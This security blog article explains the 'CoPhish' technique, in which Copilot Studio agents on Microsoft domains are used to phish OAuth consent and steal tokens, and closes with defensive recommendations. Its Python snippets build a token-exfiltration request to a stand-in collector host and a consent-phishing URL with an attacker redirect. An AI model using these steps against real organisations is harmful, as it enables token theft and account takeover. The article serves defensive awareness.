New CoPhish Attack Steals OAuth Tokens Using Copilot Studio

Written by Alexander Chapellin | Oct 27, 2025 8:19:19 PM

A new phishing technique known as “CoPhish” is gaining attention in the cybersecurity world. This method takes advantage of Microsoft Copilot Studio agents to send fake OAuth consent requests, all through legitimate Microsoft domains, making the deception much harder to detect.

The problem lies in the flexibility offered by Copilot Studio, a tool designed to automate business processes. That same flexibility has opened the door to new forms of phishing that were previously off the radar for many organizations.

Microsoft, for its part, has acknowledged the situation and confirmed that it is already working on solutions. A company spokesperson stated that they are investigating the case and plan to introduce improvements in future updates to strengthen security.

Although the CoPhish attack relies mainly on social engineering, Microsoft also noted that it is evaluating new measures to improve consent control and prevent users from unknowingly authorizing malicious applications.

 

How Is Copilot Studio Used in This Type of Phishing?

 

Copilot Studio agents are essentially chatbots that can be easily created and customized from Microsoft’s platform. These bots reside on the official domain copilotstudio.microsoft.com, giving them an air of legitimacy that attackers are exploiting.

The creation of these agents is based on what Microsoft calls “topics,” which are workflows designed to automate specific tasks within a conversation, such as answering questions or guiding users through a process.

What’s concerning is that these agents can be shared publicly by enabling the “demo website” option. This generates a URL within Microsoft’s official domain, greatly increasing the chances that a user will trust the link and end up signing in without suspecting anything.

In addition, attackers can configure these bots to simulate an authentication process. For example, at the start of a conversation, the bot may ask the user to enter a code, identify themselves, or even redirect them to another site or service. All of this happens without raising alarms, as it appears to be a legitimate interaction.

 

Customizable Login Theme in the Malicious Agent (Source: Datadog)

 

How Serious Can This Attack Be, and Who Can It Affect?

 

One of the most concerning aspects of the CoPhish attack is its flexibility. The attacker can fully customize the login button in the Copilot Studio bot, linking it to a malicious application. This application can exist either inside or outside the victim’s corporate environment, significantly expanding the attack’s reach.

This means an application administrator could be a target even without direct access to the environment where the bot is deployed. In other words, the attacker doesn’t need to be “inside” to cause damage.

In the current situation, if an attacker is already within the victim’s environment (i.e., inside the Microsoft 365 tenant), they can target any non-privileged user and use this method to escalate their access. However, Microsoft has announced changes to its default settings that will limit these attacks.

Once these new policies take effect, attackers will only be able to request limited permissions, such as read and write access to OneNote. This will close the door to more sensitive access like emails, Teams chats, or calendars. Even so, users with admin privileges will still be at risk.

 

Why Are Admins Still an Attractive Target?

 

The issue is that administrators can approve permissions for applications, even if they are not verified by Microsoft or not published by the organization. This gives attackers room to create multi-tenant applications (i.e., apps that work across multiple environments) and steer the login process toward a provider they control.

Once the user authorizes the application, the attacker can capture the session token. This can be done by configuring the bot to send a custom HTTP request (for example, to a tool like Burp Collaborator), including the access token in an HTTP header such as “token.”

With that token, the attacker can act on behalf of the user, access their data, or even move laterally within the corporate environment, depending on the permissions granted.
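The exfiltration step described above can be sketched in a few lines. This is a hypothetical illustration, not Datadog’s actual proof of concept: the collector URL is a made-up placeholder, and the request is only built, never sent.

```python
import urllib.request

# Placeholder for an attacker-controlled collector (e.g. a Burp Collaborator
# endpoint). ".invalid" is a reserved TLD, so this name can never resolve.
COLLECTOR_URL = "https://collector.example.invalid/log"


def build_exfil_request(access_token: str) -> urllib.request.Request:
    """Build (but do not send) the kind of HTTP request a malicious agent
    topic could emit, carrying the stolen OAuth token in a custom header."""
    return urllib.request.Request(
        COLLECTOR_URL,
        method="POST",
        headers={"token": access_token},  # token smuggled in a custom header
    )


if __name__ == "__main__":
    req = build_exfil_request("fake-token-for-demo")
    # urllib normalizes header names, so the header is stored as "Token"
    print(req.get_header("Token"))
```

Because the agent itself fires this request from Microsoft infrastructure, nothing in the victim’s browser ever contacts the collector directly.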

 

Add Required Actions to the Login Theme (Source: Datadog)

 

To make everything appear legitimate, attackers carefully configure the login settings of the agent in Copilot Studio. This includes using an application ID, a client secret, and the URLs of the authentication provider. These elements allow the login process to appear completely authentic, even though it is redirecting the user to a malicious application.

What’s most concerning is that the “Sign in” button shown in the chatbot can redirect the user to any URL the attacker chooses. While the OAuth consent flow URL is often used, it’s just one of many possibilities. In other words, the attacker has full control over where that button leads.
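For illustration, the consent-flow URL such a button often points at can be assembled like this. The client ID and redirect URI below are invented placeholders, not values from the reported attack; the authorize endpoint is Microsoft’s standard multi-tenant OAuth 2.0 endpoint.

```python
from urllib.parse import urlencode

# Hypothetical values: a registered multi-tenant app ID and a redirect URI
# the attacker controls. Neither comes from the reported attack.
CLIENT_ID = "11111111-2222-3333-4444-555555555555"
REDIRECT_URI = "https://attacker.example.invalid/callback"


def build_consent_url(client_id: str, redirect_uri: str, scopes: list) -> str:
    """Assemble the Microsoft identity platform authorize URL that an OAuth
    consent-phishing link ultimately resolves to."""
    params = {
        "client_id": client_id,          # the (malicious) application
        "response_type": "code",         # standard authorization-code flow
        "redirect_uri": redirect_uri,    # where the code/token is delivered
        "scope": " ".join(scopes),       # permissions the user is asked to grant
    }
    return ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize?"
            + urlencode(params))


if __name__ == "__main__":
    print(build_consent_url(CLIENT_ID, REDIRECT_URI,
                            ["Notes.ReadWrite", "offline_access"]))
```

Note that everything in this URL except the query parameters is legitimate Microsoft infrastructure, which is exactly what makes the consent screen so convincing.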

 


 

How Is the Attack Launched Against Administrators?

 

Once the attacker has set up the malicious agent and activates the “demo website” option, they can share that link directly with their targets. This can be done through phishing emails or even via messages on platforms like Microsoft Teams.

Here’s the catch: because the URL belongs to a legitimate Microsoft domain (copilotstudio.microsoft.com), and the page design looks just like any other Microsoft Copilot service, many users let their guard down.

This makes the attack highly effective—even against privileged users like administrators. These users might unknowingly grant sensitive permissions to a fake application, thinking they’re signing into a legitimate Microsoft service.

One of the few indicators that might raise suspicion is the appearance of the “Microsoft Power Platform” icon in the chatbot interface—something you might not expect when interacting with what seems to be a Copilot service. However, this is an easy detail to overlook, especially if the overall design looks trustworthy.

 

Microsoft-Hosted Page and the Login Button (Source: Datadog)

 

What Happens When an Administrator Falls for the Trap?

 

If an administrator clicks the login button on the malicious agent and approves the requested permissions, they are redirected to a legitimate authentication URL like token.botframework.com.

While this URL might look suspicious to some, it’s actually part of the standard bot validation process in Copilot Studio, further reinforcing the illusion of legitimacy.

Once the authentication process is completed, the user can begin interacting with the agent as if everything were perfectly normal. However, behind the scenes, their session token has already been sent to the attacker—without the user receiving any notification or alert about what just happened.

 

Why Is This Attack So Hard to Detect?

 

One reason CoPhish is so effective is that the token request is made from within the Copilot Studio environment, using Microsoft infrastructure and IP addresses. This means that, from the perspective of monitoring tools or user activity logs, there are no clear signs of a connection to a malicious external server. On the surface, everything looks like a legitimate interaction within Microsoft services.

 

How to Protect Against This Type of Attack

 

There are several key recommendations to reduce the risk of attacks like CoPhish:

 

  1. Limit Administrative Privileges: The fewer users with elevated privileges, the lower the impact if an account is compromised.

  2. Restrict Application Permissions: Enforcing policies that prevent users from authorizing unverified or external apps is crucial to blocking these types of access.

  3. Establish a Clear Application Consent Policy: Ensure that only pre-approved or reviewed applications can request permissions. This helps close common gaps in default configurations.

  4. Disable Automatic App Registration by Users: This prevents any user from registering new apps within the environment without oversight.

  5. Monitor Consent and Agent Creation: Closely monitoring events related to application consent in Microsoft Entra ID (formerly Azure AD) and the creation of new agents in Copilot Studio can help detect unusual activity early.
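As a sketch of point 5, here is how exported consent audit events could be triaged. The field names (`activity`, `app_owned_by_tenant`, `scopes`) are simplified assumptions for illustration, not the exact Microsoft Entra ID audit-log schema.

```python
# Scopes that, per the attack described above, give access to emails, Teams
# chats, and calendars. Names follow Microsoft Graph delegated permissions.
SENSITIVE_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Chat.Read", "Calendars.Read"}


def flag_suspicious_consents(events: list) -> list:
    """Return consent events worth a closer look: grants to applications not
    owned by the tenant (external / multi-tenant apps), or grants that
    include sensitive scopes."""
    flagged = []
    for ev in events:
        if ev.get("activity") != "Consent to application":
            continue  # ignore unrelated audit events
        external_app = not ev.get("app_owned_by_tenant", True)
        scopes = set(ev.get("scopes", []))
        if external_app or scopes & SENSITIVE_SCOPES:
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    sample = [
        {"activity": "Consent to application",
         "app_owned_by_tenant": False, "scopes": ["Notes.ReadWrite"]},
        {"activity": "Consent to application",
         "app_owned_by_tenant": True, "scopes": ["Mail.Read"]},
        {"activity": "Sign-in", "app_owned_by_tenant": True, "scopes": []},
    ]
    for ev in flag_suspicious_consents(sample):
        print("review:", ev)
```

A rule like this is a starting point for alerting, not a replacement for reviewing the consent policies themselves.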

 

What Should We Learn from CoPhish?

 

This type of attack highlights how adversaries are leveraging legitimate tools to create sophisticated attack vectors. It’s no longer just about emails with strange links or misspelled domains. Phishing now masquerades as ordinary business processes, using trusted infrastructure to fly under the radar.

The CoPhish case is a clear example of why security cannot rely solely on domain appearance or page design. Even when everything seems to be within the Microsoft ecosystem, it’s essential to carefully review permission requests, application origins, and the purpose behind each authentication flow.

Beyond technical measures, cybersecurity education is critical. Training users to identify risks, understand how attacks like CoPhish work, and respond wisely to unusual requests can prevent unauthorized access before it happens. Technology offers protection, but well-informed people are the first line of defense.